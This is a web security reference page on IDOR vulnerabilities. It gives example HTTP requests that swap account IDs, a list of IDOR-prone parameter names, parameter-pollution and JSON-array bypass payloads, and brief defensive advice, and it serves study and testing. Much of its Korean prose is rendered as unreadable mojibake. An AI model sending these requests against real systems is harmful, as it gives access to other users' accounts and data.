IDOR (Insecure Direct Object Reference)

๐Ÿ” Introduction

IDOR (Insecure Direct Object References) is an access-control vulnerability: when externally exposed or user-supplied input directly references and accesses an object, an attacker can use that input to perform actions beyond their own privileges.

Origin Request

GET /info?accountId=15442

IDOR Request

GET /info?accountId=1110

์ผ๋ฐ˜์ ์œผ๋ก  Horizontal privilege escalation ์ฆ‰, ์ˆ˜ํ‰์ ์œผ๋กœ ๊ถŒํ•œ์„ ์•…์šฉํ•  ์ˆ˜ ์žˆ์ง€๋งŒ ๋•Œ๋•Œ๋กœ ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ตฌ์„ฑ์ด๋‚˜ ์ •์ฑ…์— ๋”ฐ๋ผ์„œ Vertical privilege escalation(์ˆ˜์ง์  ๊ถŒํ•œ ์ƒ์Šน)์œผ๋กœ ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

🗡 Offensive techniques

Detect

์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ฒ˜๋ฆฌ ๋กœ์ง์—์„œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’์ด Object์— ์ง์ ‘ ์ฐธ์กฐ๋˜๋Š” ๋ถ€๋ถ„๋“ค์ด ๋ชจ๋‘ ์˜ํ–ฅ ๋ฐ›์Šต๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ID, Username ๋“ฑ ์‹๋ณ„ ๊ฐ’์ด ํฌ์ธํŠธ๊ฐ€ ๋˜๋ฉฐ, ํŒŒ๋ผ๋ฏธํ„ฐ๊ฐ€ ์•„๋‹Œ Static File ๋“ฑ์—์„œ๋„ ์‹๋ณ„ ์ •๋ณด๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœํ•œ ๋ฐ์ดํ„ฐ ์ฐธ์กฐ๊ฐ€ ์žˆ๋Š” ๊ฒฝ์šฐ IDOR์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Origin Request

POST /save_profile HTTP/1.1

account=15442&name=aaa

IDOR Request

POST /save_profile HTTP/1.1

account=1110&name=aaa

์œ„ ์˜ˆ์‹œ์—์„œ account์™€ ๊ฐ™์ด ์‚ฌ์šฉ์ž์˜ Object์— ์ฐธ์กฐ๋ ๋งŒํ•œ ํŒŒ๋ผ๋ฏธํ„ฐ์— ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž์˜ ๊ฐ’์„ ๋„ฃ์–ด ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ฒ˜๋ฆฌ, ๋ฆฌํ„ด๋˜๋Š” ๋ฐ˜์‘์„ ์‚ดํ•๋‹ˆ๋‹ค. ๋งŒ์•ฝ account ๊ฐ’์„ 1110์„ ์‚ฌ์šฉํ•˜๋Š” ์œ ์ €์˜ ๋ฐ์ดํ„ฐ๊ฐ€ ๋ณ€๊ฒฝ๋˜์—ˆ๋‹ค๋ฉด IDOR์— ์ทจ์•ฝํ•œ ๊ฒƒ์œผ๋กœ ํŒ๋‹จํ•ฉ๋‹ˆ๋‹ค.

With HUNT

In ZAP and Burp Suite, the HUNT add-on can identify requests that may be susceptible to IDOR in a passive-scan fashion. See the articles below for details.

  • https://www.hahwul.com/2022/04/12/zap-hunt-remix/
  • https://www.hahwul.com/2018/04/18/bugcrowd-hunt-burp-extension/

With GF-Patterns

The representative parameter names listed in GF-Patterns are shown below. These parameters are the main targets for IDOR.

[
    "id=",
    "user=",
    "account=",
    "number=",
    "order=",
    "no=",
    "doc=",
    "key=",
    "email=",
    "group=",
    "profile=",
    "edit=",
    "report="
]

Exploitation

Horizontal privilege escalation

์ˆ˜ํ‰ ๊ถŒํ•œ ์ƒ์Šน์€ IDOR๋ฅผ ํ†ตํ•ด ์œ ์‚ฌํ•œ ๊ถŒํ•œ์„ ๊ฐ€์ง„ ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

Origin Request

POST /save_profile HTTP/1.1

account=15442&name=aaa

IDOR Request

POST /save_profile HTTP/1.1

account=1110&name=aaa

Vertical privilege escalation

์ˆ˜์ง ๊ถŒํ•œ ์ƒ์Šน์€ IDOR๋ฅผ ํ†ตํ•ด ์ƒ์œ„ ๊ถŒํ•œ์„ ๊ฐ€์ง„ ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๋ณดํ†ต ์ผ๋ฐ˜ ๊ณ„์ •๊ฐ„์˜ ๊ถŒํ•œ ๋ฌธ์ œ๊ฐ€ ์•„๋‹Œ Admin ๋“ฑ ์ƒ์œ„ ๊ถŒํ•œ์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์นจ๋ฒ”ํ•˜๋Š” ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

Origin Request

POST /save_profile HTTP/1.1

account=15442&name=aaa

IDOR Request

POST /save_profile HTTP/1.1

admin_account=1&name=aaa

Bypass protection

HPP

IDOR protections can sometimes be bypassed through HPP (HTTP Parameter Pollution).

Bypass Request

POST /save_profile HTTP/1.1

account=15442&account=1110&name=aaa

Bypass Request (Array)

POST /save_profile HTTP/1.1

account[]=15442&account[]=1110&name=aaa

JSON Array

Origin Request

POST /save_profile HTTP/1.1

{
    "account":"15442"
}

Bypass Request

POST /save_profile HTTP/1.1

{
    "account":[
        "15442",
        "1110"
    ]
}

Change Method

Bypass Request

PUT /save_profile HTTP/1.1

account=1110&name=aaa

🛡 Defensive techniques

๋Œ€์‘ ๋ฐฉ์•ˆ์€ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ์ž์˜ ์ž…๋ ฅ์„ ์‹ ๋ขฐํ•˜์ง€ ์•Š๊ณ  ์„ธ์…˜, ์ฟ ํ‚ค ๋“ฑ ์ธ์ฆ ์ •๋ณด์™€ ๋น„๊ตํ•˜์—ฌ ๊ถŒํ•œ์„ ์ •ํ™•ํ•˜๊ฒŒ ๊ฒ€์ฆํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

๋˜ํ•œ ์ธ์ฆ ์ •๋ณด๋ฅผ ๊ฒ€์ฆํ•  ์ˆ˜ ์—†๋Š” API ๋“ฑ์˜ ๊ฒฝ์šฐ ์‚ฌ์šฉ์ž๊ฐ€ ์ง์ ‘ ๋ฐ์ดํ„ฐ๋ฅผ ํ†ต์ œํ•  ์ˆ˜ ์—†๋„๋ก ๋ฒก์—”๋“œ ๋’ค์— MSA ํ˜•ํƒœ๋กœ ์ˆจ๊ธฐ๋˜๊ฐ€ ์•ž์— ๋ณ„๋„์˜ Interface๋ฅผ ๊ตฌํ˜„ํ•˜์—ฌ ๋Œ€์‘ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

🕹 Tools

📚 Articles

  • https://www.hahwul.com/2022/04/12/zap-hunt-remix/

📌 References

  • https://portswigger.net/web-security/access-control/idor
  • https://github.com/1ndianl33t/Gf-Patterns/blob/master/idor.json
  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
  • https://wiki.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)
  • https://book.hacktricks.xyz/pentesting-web/idor